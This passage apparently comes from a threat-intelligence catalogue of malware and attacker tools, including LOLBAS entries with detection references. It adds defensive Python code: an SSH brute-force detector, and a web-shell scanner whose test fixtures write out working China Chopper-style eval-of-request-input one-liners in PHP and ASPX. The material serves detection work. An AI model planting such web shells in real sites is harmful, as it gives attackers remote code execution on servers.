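        ts = datetime.strptime(f"{ASSUMED_YEAR} {stamp}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["method"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Sources with >= threshold failures inside any window_s span, with the
    usernames tried and any accounts the source then entered with a password."""
    fails, users, later_success = defaultdict(list), defaultdict(set), defaultdict(list)
    for ts, result, method, user, ip in parse(log_text):
        if result == "Failed":
            fails[ip].append(ts)
            users[ip].add(user)
        elif method == "password" and ip in fails:
            later_success[ip].append(user)
    findings = {}
    for ip, stamps in fails.items():
        stamps.sort()
        burst = any((stamps[i + threshold - 1] - stamps[i]).total_seconds() <= window_s
                    for i in range(len(stamps) - threshold + 1))
        if burst:
            findings[ip] = {"failures": len(stamps), "usernames": sorted(users[ip]),
                            "succeeded_as": later_success[ip]}
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

A single mistyped password followed by success (the second source) stays below the threshold by design; the first source trips it and is also reported as having succeeded as root, which is the finding that should page someone. Key-based logins are parsed but never count as guesses.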

Internal MISP references

UUID 92c88765-6b12-42cd-b1d7-f6a65b2236e2 which can be used as unique global reference for Chaos in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0220
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

CharmPower

CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.[Check Point APT35 CharmPower January 2022]

Internal MISP references

UUID b1e3b56f-2e83-4cab-a1c1-16999009d056 which can be used as unique global reference for CharmPower in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0674
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

ChChes

ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [Palo Alto menuPass Feb 2017] [JPCERT ChChes Feb 2017] [PWC Cloud Hopper Technical Annex April 2017]

Internal MISP references

UUID 3f2283ef-67c2-49a3-98ac-1aa9f0499361 which can be used as unique global reference for ChChes in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0144
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Cherry Picker

Cherry Picker is a point of sale (PoS) memory scraper. [Trustwave Cherry Picker]

Internal MISP references

UUID 2fd6f564-918e-4ee7-920a-2b4be858d11a which can be used as unique global reference for Cherry Picker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0107
source MITRE
type ['malware']

China Chopper

China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.[Lee 2013] It has been used by several threat groups.[Dell TG-3390][FireEye Periscope March 2018][CISA AA21-200A APT40 July 2021][Rapid7 HAFNIUM Mar 2021]
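Since a China Chopper-style shell never beacons out, network-based C2 detection does not see it; the server-side component is a one-liner that hands request input to an eval, and that is what has to be found on disk. The added example below (not from the cited reports, and also covering the BlackMould and Caterpillar WebShell entries above as IIS-side derivatives of the same idea) scans a web root for that construct. The sample tree is constructed in a temporary directory; the PHP and ASPX samples follow the form documented for China Chopper, the others are benign decoys that must not match.

```python
"""Scan a web root for the eval-of-request-input construct that China Chopper's
server side consists of (and that IIS derivatives such as BlackMould inherit).

Added example, not from the cited reports. The sample tree is constructed in a
temp directory; SAMPLES is made up apart from the documented one-liner forms.
"""
import pathlib
import re
import tempfile

# Each rule: dynamic code execution fed directly, or through one decoder call,
# from request input. Kept narrow on purpose so that legitimate eval use of
# constant strings does not fire.
RULES = [
    ("php_eval_request",
     re.compile(r"\b(?:eval|assert)\s*\(\s*(?:@?\w+\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)),
    ("aspx_jscript_eval_request",
     re.compile(r"\beval\s*\(\s*Request(?:\.Item|\.Form|\.QueryString)?\s*[\[\(]", re.I)),
    ("jsp_exec_request_param",
     re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I)),
]
SCRIPT_SUFFIXES = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}


def scan_file(path: pathlib.Path):
    """Names of rules matching the file's text."""
    text = path.read_text(errors="replace")
    return [name for name, rx in RULES if rx.search(text)]


def scan_tree(root):
    """Relative POSIX path -> matched rule names, for server-side script files only."""
    root = pathlib.Path(root)
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            names = scan_file(path)
            if names:
                hits[path.relative_to(root).as_posix()] = names
    return hits


SAMPLES = {  # constructed web root
    "uploads/img.php": "<?php @eval($_POST['chopper']);?>",
    "data/cache.php": "<?php eval(base64_decode($_REQUEST['c'])); ?>",
    "bin/h.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "index.php": "<?php echo 'hello'; ?>",
    "lib/tpl.php": "<?php $x = eval('return 1+1;'); ?>",
    "app/login.aspx": '<%@ Page Language="C#" %><html>login</html>',
    "static/app.js": "eval(location.hash)",   # client-side, not a server script
}


def make_sample_tree():
    """Write SAMPLES under a fresh temp directory and return its path."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="webroot_"))
    for rel, body in SAMPLES.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    for rel, names in sorted(scan_tree(make_sample_tree()).items()):
        print(rel, names)
```

This is a triage pass, not a verdict: obfuscated or multi-stage shells will not match a handful of regexes, so pair it with a file-integrity baseline of the web root and with web-server access logs showing POSTs to recently created script files.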

Internal MISP references

UUID 723c5ab7-23ca-46f2-83bb-f1d1e550122c which can be used as unique global reference for China Chopper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0020
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '311abf64-a9cc-4c6a-b778-32c5df5658be']
type ['malware']
Related clusters

To see the related clusters, click here.

Chinoxy

Chinoxy is a backdoor that has been used since at least November 2018, during the FunnyDream campaign, to gain persistence and drop additional payloads. According to security researchers, Chinoxy has been used by Chinese-speaking threat actors.[Bitdefender FunnyDream Campaign November 2020]

Internal MISP references

UUID 7c36563a-9143-4766-8aef-4e1787e18d8c which can be used as unique global reference for Chinoxy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1041
source MITRE
type ['malware']

Chisel

Chisel is an open source tool that can be used for network tunneling.[U.S. CISA AvosLocker October 11 2023] According to its GitHub project page, "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".[GitHub Chisel] Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.[U.S. CISA AvosLocker October 11 2023][CISA AA20-259A Iran-Based Actor September 2020]

Internal MISP references

UUID bd2b2375-4f16-42b2-a862-959b5b41c2af which can be used as unique global reference for Chisel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5063
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Chocolatey

Chocolatey is a command-line package manager for Microsoft Windows.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 7a2b00ef-8a37-4901-bf0c-17da0ebf3d69 which can be used as unique global reference for Chocolatey in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5028
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

CHOPSTICK

CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [FireEye APT28] [ESET Sednit Part 2] [FireEye APT28 January 2017] [DOJ GRU Indictment Jul 2018] It is tracked separately from the X-Agent for Android.

Internal MISP references

UUID 01c6c49a-f7c8-44cd-a377-4dfd358ffeba which can be used as unique global reference for CHOPSTICK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0023
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Chrommme

Chrommme is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with Gelsemium malware.[ESET Gelsemium June 2021]

Internal MISP references

UUID df77ed2a-f135-4f00-9a5e-79b7a6a2ed14 which can be used as unique global reference for Chrommme in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0667
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']

Clambling

Clambling is a modular backdoor written in C++ that has been used by Threat Group-3390 since at least 2017.[Trend Micro DRBControl February 2020]

Internal MISP references

UUID 4bac93bd-7e58-4ddb-a205-d99597b9e65e which can be used as unique global reference for Clambling in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0660
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

CL_Invocation

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Aero diagnostics script

Author: Oddvar Moe

Paths:
* C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
* C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1

Resources:

Detection:
* Sigma: proc_creation_win_lolbin_cl_invocation.yml
* Sigma: posh_ps_cl_invocation_lolscript.yml[CL_Invocation.ps1 - LOLBAS Project]

Internal MISP references

UUID 4bc36e22-6529-4a4a-a5d2-461f3925c5f3 which can be used as unique global reference for CL_Invocation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5257
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CL_LoadAssembly

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: PowerShell Diagnostic Script

Author: Jimmy (@bohops)

Paths: * C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1

Resources: * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

Detection: * Sigma: proc_creation_win_lolbas_cl_loadassembly.yml[CL_LoadAssembly.ps1 - LOLBAS Project]

Internal MISP references

UUID cb950179-334d-4bd9-9cfb-87b09d279a3b which can be used as unique global reference for CL_LoadAssembly in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5255
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CL_Mutexverifiers

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Proxy execution with CL_Mutexverifiers.ps1

Author: Oddvar Moe

Paths:
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
* C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
* C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
* C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1

Resources: * https://twitter.com/pabraeken/status/995111125447577600

Detection: * Sigma: proc_creation_win_lolbin_cl_mutexverifiers.yml[CL_Mutexverifiers.ps1 - LOLBAS Project]

Internal MISP references

UUID 3c63792a-1184-416e-aa9b-18da72e88327 which can be used as unique global reference for CL_Mutexverifiers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5256
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Clop

Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.[Mcafee Clop Aug 2019][Cybereason Clop Dec 2020][Unit42 Clop April 2021]

Internal MISP references

UUID 5321aa75-924c-47ae-b97a-b36f023abf2a which can be used as unique global reference for Clop in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0611
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b15c16f7-b8c7-4962-9acc-a98a39f87b69', 'b18b5401-d88d-4f28-8f50-a884a5e58349', 'ac862a66-a4ec-4285-9a21-b63576a5867d', '5ab5f811-5c7e-4f77-ae90-59d3beb93346', '1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0', 'e401022a-36ac-486d-8503-dd531410a927', '8a77c410-bed9-4376-87bf-5ac84fbc2c9d', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

CloudDuke

CloudDuke is malware that was used by APT29 in 2015. [F-Secure The Dukes] [Securelist Minidionis July 2015]

Internal MISP references

UUID b3dd424b-ee96-449c-aa52-abbc7d4dfb86 which can be used as unique global reference for CloudDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0054
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

cmd

cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. [TechNet Cmd]

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir [TechNet Dir]), deleting files (e.g., del [TechNet Del]), and copying files (e.g., copy [TechNet Copy]).

Internal MISP references

UUID 98d89476-63ec-4baf-b2b3-86c52170f5d8 which can be used as unique global reference for cmd in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0106
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'a968c9f3-c190-488f-bacc-92e8f1ce295c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Cmdkey

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Creates, lists, and deletes stored user names and passwords or credentials.

Author: Oddvar Moe

Paths:
* C:\Windows\System32\cmdkey.exe
* C:\Windows\SysWOW64\cmdkey.exe

Resources:
* https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
* https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey

Detection:
* Sigma: proc_creation_win_cmdkey_recon.yml[Cmdkey.exe - LOLBAS Project]

Internal MISP references

UUID da252f67-2d4e-419f-b493-d4a1d024a01c which can be used as unique global reference for Cmdkey in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5089
source Tidal Cyber
tags ['96bff827-e51f-47de-bde6-d2eec0f99767', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

cmdl32

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Connection Manager Auto-Download

Author: Elliot Killick

Paths:
* C:\Windows\System32\cmdl32.exe
* C:\Windows\SysWOW64\cmdl32.exe

Resources:
* https://github.com/LOLBAS-Project/LOLBAS/pull/151
* https://twitter.com/ElliotKillick/status/1455897435063074824
* https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/

Detection:
* Sigma: proc_creation_win_lolbin_cmdl32.yml
* IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
* IOC: Useragent Microsoft(R) Connection Manager Vpn File Update[cmdl32.exe - LOLBAS Project]

Internal MISP references

UUID 44a523a8-9ed6-4f01-9a53-0e8ea1e15b51 which can be used as unique global reference for cmdl32 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5090
source Tidal Cyber
tags ['4c8f8830-0b2c-4c79-b1db-8659ede492f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Cmstp

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Installs or removes a Connection Manager service profile.

Author: Oddvar Moe

Paths:
* C:\Windows\System32\cmstp.exe
* C:\Windows\SysWOW64\cmstp.exe

Resources:
* https://twitter.com/NickTyrer/status/958450014111633408
* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
* https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

Detection:
* Sigma: proc_creation_win_cmstp_execution_by_creation.yml
* Sigma: proc_creation_win_uac_bypass_cmstp.yml
* Splunk: cmlua_or_cmstplua_uac_bypass.yml
* Elastic: defense_evasion_suspicious_managedcode_host_process.toml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* IOC: Execution of cmstp.exe without a VPN use case is suspicious
* IOC: DotNet CLR libraries loaded into cmstp.exe
* IOC: DotNet CLR Usage Log - cmstp.exe.log[Cmstp.exe - LOLBAS Project]

Internal MISP references

UUID 6f848e15-5234-4445-9a05-2949e4c57f0b which can be used as unique global reference for Cmstp in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5091
source Tidal Cyber
tags ['65938118-2f00-48a1-856e-d1a75a08e3c6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Cobalt Strike

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[cobaltstrike manual]

In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[cobaltstrike manual]

Internal MISP references

UUID 9b6bcbba-3ab4-4a4c-a233-cd12254823f6 which can be used as unique global reference for Cobalt Strike in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0154
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '56d89c06-23a0-4642-adfc-1fffd3524191', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['malware']
Related clusters

To see the related clusters, click here.

Cobalt Strike Random C2 Profile Generator

This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.[GitHub random_c2_profile] According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.[CERTFR-2023-CTI-007]

Internal MISP references

UUID cf47b3ce-1392-4904-a4e6-f65aebebddc6 which can be used as unique global reference for Cobalt Strike Random C2 Profile Generator in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5057
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['malware']
Related clusters

To see the related clusters, click here.

Cobian RAT

Cobian RAT is a backdoor, remote access tool that has been observed since 2016.[Zscaler Cobian Aug 2017]

Internal MISP references

UUID d4e6f9f7-7f4d-47c2-be24-b267d9317303 which can be used as unique global reference for Cobian RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0338
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']

code

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: VSCode binary, also portable (CLI) version

Author: PfiatDe

Paths:
* %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe
* C:\Program Files\Microsoft VS Code\Code.exe
* C:\Program Files (x86)\Microsoft VS Code\Code.exe

Resources:
* https://badoption.eu/blog/2023/01/31/code_c2.html
* https://code.visualstudio.com/docs/remote/tunnels
* https://code.visualstudio.com/blogs/2022/12/07/remote-even-better

Detection:
* IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com
* IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe
* IOC: File write of code_tunnel.json, which is parameterizable but defaults to %UserProfile%\.vscode-cli\code_tunnel.json[code.exe - LOLBAS Project]

Internal MISP references

UUID 49d440e4-b2ea-4e7d-8ded-8589ddf679d9 which can be used as unique global reference for code in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5185
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CoinTicker

CoinTicker is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.[CoinTicker 2019]

Internal MISP references

UUID b0d9b31a-072b-4744-8d2f-3a63256a932f which can be used as unique global reference for CoinTicker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0369
source MITRE
type ['malware']

Colorcpl

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary that handles color management

Author: Arjan Onwezen

Paths:
* C:\Windows\System32\colorcpl.exe
* C:\Windows\SysWOW64\colorcpl.exe

Resources:
* https://twitter.com/eral4m/status/1480468728324231172

Detection:
* Sigma: file_event_win_susp_colorcpl.yml
* IOC: colorcpl.exe writing files[Colorcpl.exe - LOLBAS Project]

Internal MISP references

UUID 9f006b88-2f13-4c99-ade0-839da70d1e11 which can be used as unique global reference for Colorcpl in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5092
source Tidal Cyber
tags ['884eb1b1-aede-4db0-8443-ba50624682e1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Comnie

Comnie is a remote backdoor which has been used in attacks in East Asia. [Palo Alto Comnie]

Internal MISP references

UUID 341fc709-4908-4e41-8df3-554dae6d72b0 which can be used as unique global reference for Comnie in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0244
source MITRE
type ['malware']

ComRAT

ComRAT is a second stage implant suspected of being a descendant of Agent.btz and used by Turla. The first version of ComRAT was identified in 2007, but the tool has undergone substantial development for many years since.[Symantec Waterbug][NorthSec 2015 GData Uroburos Tools][ESET ComRAT May 2020]

Internal MISP references

UUID 300c5997-a486-4a61-8213-93a180c22849 which can be used as unique global reference for ComRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0126
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Comsvcs

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: COM+ Services

Author: LOLBAS Team

Paths: * c:\windows\system32\comsvcs.dll

Resources: * https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

Detection:
* Sigma: proc_creation_win_rundll32_process_dump_via_comsvcs.yml
* Sigma: proc_access_win_lsass_dump_comsvcs_dll.yml
* Elastic: credential_access_cmdline_dump_tool.toml
* Splunk: dump_lsass_via_comsvcs_dll.yml[Comsvcs.dll - LOLBAS Project]

Internal MISP references

UUID 0448178d-fff1-4174-8339-e6bfca78fb84 which can be used as unique global reference for Comsvcs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5202
source Tidal Cyber
tags ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '334b0ee4-5a0d-4634-91c8-236593b818a0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Conficker

Conficker is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.[SANS Conficker] In 2016, a variant of Conficker made its way onto computers and removable disk drives belonging to a nuclear power plant.[Conficker Nuclear Power Plant]

Internal MISP references

UUID ef33f1fa-18a3-4b30-b359-17b7930f43a7 which can be used as unique global reference for Conficker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0608
source MITRE
type ['malware']

ConfigSecurityPolicy

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary that is part of Windows Defender, used to manage Windows Defender settings. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Author: Ialle Teixeira

Paths:
* C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

Resources:
* https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
* https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
* https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
* https://twitter.com/NtSetDefault/status/1302589153570365440?s=20

Detection:
* Sigma: proc_creation_win_lolbin_configsecuritypolicy.yml
* IOC: ConfigSecurityPolicy storing data into alternate data streams.
* IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
* IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"[ConfigSecurityPolicy.exe - LOLBAS Project]

Internal MISP references

UUID 0e178275-4eb7-4fae-a703-d9730adf6a26 which can be used as unique global reference for ConfigSecurityPolicy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5093
source Tidal Cyber
tags ['d99039e1-e677-4226-8b63-e698d6642535', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Conhost

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Console Window host

Author: Wietze Beukema

Paths: * c:\windows\system32\conhost.exe

Resources:
* https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
* https://twitter.com/Wietze/status/1511397781159751680
